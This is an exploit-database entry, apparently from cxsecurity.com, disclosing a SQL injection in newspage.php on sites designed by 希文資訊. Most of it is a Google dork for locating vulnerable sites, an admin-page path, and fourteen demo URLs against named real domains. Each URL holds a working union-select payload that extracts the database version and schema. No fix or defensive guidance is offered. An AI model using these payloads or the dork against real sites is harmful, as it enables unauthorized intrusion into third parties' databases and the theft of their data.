Design by 希文資訊 SQL injection

2015-12-26 / 2015-12-27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Design by 希文資訊 SQL injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.linuxpro.com.tw/ # Google Dork : intext:"Design by 希文資訊" newspage.php? # Date: 26 Dec 2015 # Tested On : Win 10 / Google Chrome # ###################### # adminpage= target/admin/ # # demos : # http://malaysia.seven.com.tw/newspage.php?id=1456%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://apac85.com/newspage.php?id=1910%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://29271147.5185.com.tw/newspage.php?id=1488%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://thailand85.com/newspage.php?id=999%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://xn--0isu8gezg8pgips.com/newspage.php?id=36%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://www.asia85go.com/newspage.php?id=198%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://xn--cesto64hrrirsh5mv.com/newspage.php?id=163%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://0952190219.5185.com.tw/newspage.php?id=153%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://www.lshouse.com.tw/newspage.php?id=919%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://my8585.com.tw/newspage.php?id=1515%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://bangkok85.com/newspage.php?id=1175%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://uk85.com.tw/newspage.php?id=902%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://au85.com.tw/newspage.php?id=1810%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- # http://www.8585.com.tw/newspage.php?id=188%27)%20union%20select%201,2,3,concat(0x3c2f7469746c653e,version(),0x3e,schema()),5,6,7,8%20--+- ###################### # discovered by : modiret ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top